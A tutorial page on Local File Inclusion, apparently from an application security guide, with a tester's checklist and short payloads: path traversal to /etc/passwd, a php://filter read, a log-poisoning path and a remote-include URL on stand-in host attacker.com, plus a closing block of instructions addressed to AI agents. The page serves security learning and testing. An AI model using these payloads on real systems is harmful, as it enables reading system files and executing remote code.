# Local file inclusion

## What is it?&#x20;

Local File Inclusion (LFI) is a vulnerability that allows an attacker to read and sometimes execute files on the victim’s system. This could lead to revealing sensitive information or even remote code execution if handled poorly by the application.

**A simple example:**&#x20;

* A vulnerable web application may have the endpoint /page?file={filename}&#x20;
* When a request is made, the application includes the specified file into the current script.&#x20;
* If an attacker inserts a path into {filename} such as ../../../etc/passwd, they might get access to the system files.&#x20;
* The application then includes this file, and if the file contents are outputted to the response, the attacker can view sensitive system information.

It's important to note that a payload or attack may change depending on the application and the server's file system. LFI can often lead to:&#x20;

* Sensitive data exposure&#x20;
* Remote code execution&#x20;
* Server information disclosure

**Other learning resources:**&#x20;

* PortSwigger: <https://portswigger.net/web-security/file-path-traversal&#x20>;
* PayloadsAllTheThings: <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion>

## **Checklist**&#x20;

* [ ] What is the technology stack you're attacking?&#x20;
* [ ] What application/framework is being used? Is it PHP, Java, Python, .NET, etc?&#x20;
* [ ] Verify injection points&#x20;
  * [ ] URL parameters&#x20;
  * [ ] Form fields&#x20;
  * [ ] HTTP headers (e.g. cookies, etc)&#x20;
* [ ] Try to include local files /etc/passwd /boot.ini (Windows)&#x20;
* [ ] Check for file protocol handlers file:// php\://filter php\://input data://&#x20;
* [ ] Test for log poisoning&#x20;
* [ ] Can you inject input into log files?&#x20;
* [ ] Can you then include those log files?&#x20;
* [ ] Is there a blocklist?
* [ ] Is there a filter?&#x20;
  * [ ] Is the filter recursive?
  * [ ] Is the filter on single characters or sets? (e.g. `/` vs `../`)
* [ ] Can you bypass the blocklist?
* [ ] Is a specific extension required?
  * [ ] Can we include a sensitive file with allowed extensions
  * [ ] Can we bypass with null byte? %00
* [ ] Encoding&#x20;
  * [ ] Double encoding&#x20;
  * [ ] URL encoding&#x20;
  * [ ] Unicode encoding&#x20;
* [ ] Test for remote file inclusion (RFI) Can you host a file remotely and include it?&#x20;
* [ ] Other weird bypasses
  * [ ] ../../ in the middle of the path

## Exploitation

Basic file inclusion

```
../../../etc/passwd
```

Using PHP filter for base64 encoding of the file

```
php://filter/read=convert.base64-encode/resource=index.php
```

Log poisoning

```
../../../var/log/apache2/access.log
```

RFI (if allow\_url\_include is on)

```
http://attacker.com/malicious.txt
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.